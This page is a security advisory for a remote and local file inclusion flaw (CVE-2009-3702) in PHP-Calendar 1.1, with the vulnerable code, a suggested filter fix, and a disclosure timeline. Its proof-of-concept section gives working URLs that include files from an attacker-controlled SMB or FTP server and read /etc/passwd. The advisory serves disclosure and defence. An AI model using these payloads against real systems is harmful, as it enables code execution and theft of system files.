SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
IT News
Search
SecurityAlert Database
About SecurityAlert
ExploitAlert Database
SecurityReason Research
WLB
WLB Database
Send to WLB
About WLB
Services
Security Audit
Schedule
Prices of services
Contact
RSS
SecurityReason IT News
SecurityAlert
World Laboratory of Bugtraq
ExploitAlert
Apache
PHP
Corporate
Contact
About SecurityReason
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com
Home arrow SecurityAlert Database

Arrow  Topic :

PHP-Calendar <= v1.1 Remote and Local File Inclusion vulnerability


Arrow  SecurityAlert : 6863
Arrow  CVE : CVE-2009-3702
Arrow  CWE : CWE-22
Arrow  SecurityRisk : High  Security Risk High  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Victim interaction required : No
Arrow  Exploit Available : Yes
Arrow  Credit : ISecAuditors
Arrow  Published : 24.12.2009

Arrow  Affected Software : php-calendar:php-calendar:1.1



Arrow  Advisory Content :  

=============================================
INTERNET SECURITY AUDITORS ALERT 2009-011
- Original release date: October 13th, 2009
- Last revised: December 18th, 2009
- Discovered by: Juan Galiana Lara
- CVE ID: CVE-2009-3702
- Severity: 8.5/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
-------------------------
PHP-Calendar v1.1 'configfile' Remote and Local File Inclusion
vulnerability

II. BACKGROUND
-------------------------
PHP-Calendar is a simple web calendar. It is targeted towards groups
that need to collaboratively create and track events. In that same
collaborative spirit, the source for PHP-Calendar is available under
an open source license for anyone to use and modify.

III. DESCRIPTION
-------------------------
The 'configfile' variable is not properly filtered, and is possible to
include arbitrary remote and local files. This attack may lead to the
execution of arbitrary code.

The snippet of vulnerable code (part of update08.php and update10.php
file):

36 } elseif(!empty($_GET['configfile'])) {
37 if(file_exists($_GET['configfile'])) {
38 require_once($_GET['configfile']);

In order to include remote files, the value 'On' in the
allow_url_fopen directive is needed. There are two cases in which it
is possible remote code execution due to bypass the file_exists function:

1) If the victim server is running Windows operating system and there
is not a firewall filtering outgoing SMB requests, an attacker can use
an URL like //servername/path/to/file.php
2) If server is running PHP version > 5.0.0 (the most common) an
attacker can use FTP/FTPS protocol for inclusion. Like
ftp://servername/path/to/file.php See references for more information.

IV. PROOF OF CONCEPT
-------------------------
For including remote files:

http://site/php-calendar-1.1/update08.php?configfile=//servername/path/t
o/file.php
http://site/php-calendar-1.1/update08.php?configfile=ftp://guest:pass@si
te/path/to/file.php
http://site/php-calendar-1.1/update10.php?configfile=\\ip\path\to\file.p
hp
http://site/php-calendar-1.1/update10.php?configfile=ftp://site/path/to/
file.php

Local files, this PoC will show the /etc/passwd file:

http://site/php-calendar-1.1/update08.php?configfile=/etc/passwd
http://site/php-calendar-1.1/update10.php?configfile=/etc/passwd

V. BUSINESS IMPACT
-------------------------
Unauthenticated users can view any local file in the filesystem and
could execute arbitrary code remotely.

VI. SYSTEMS AFFECTED
-------------------------
PHP-Calendar version 1.1 is vulnerable, others may be affected

VII. SOLUTION
-------------------------
Change the code of update08.php (line 38) and update10.php (line 35)
in order to filter $_GET['configfile'] variable.

if (ereg('^[a-zA-Z0-9_]+$', $_GET['configfile']))
require_once($_GET['configfile']);

III. REFERENCES
-------------------------
http://www.php-calendar.com/
http://www.php.net/manual/en/wrappers.ftp.php
http://www.isecauditors.com/

IX. CREDITS
-------------------------
This vulnerability has been discovered by
Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
October 13, 2009: Initial release.
October 19, 2009: Added CVE id.
December 18, 2009: Last revision.

XI. DISCLOSURE TIMELINE
-------------------------
October 13, 2009: Vulnerability discovered by
Internet Security Auditors (www.isecauditors.com)
October 13, 2009: Sent to developers. No response.
December 13, 2009: Contact again. No response.
December 18, 2009: Added mitigation solution and sent to lists.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.



Arrow  References :

http://www.securityfocus.com/archive/1/archive/1/508548/100/0/threaded




Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server
Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability
PHP RSS PHP Alert

» PHP Hashtables Denial of
   Service

» PHP 5.3.6 multiple null
   pointer dereference

» PHP 5.3.6 ZipArchive
   invalid use glob(3)

» libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)
ADT

Protect your family and valuables with Home Security Systems
Copyright © SecurityReason.com. All Rights Reserved.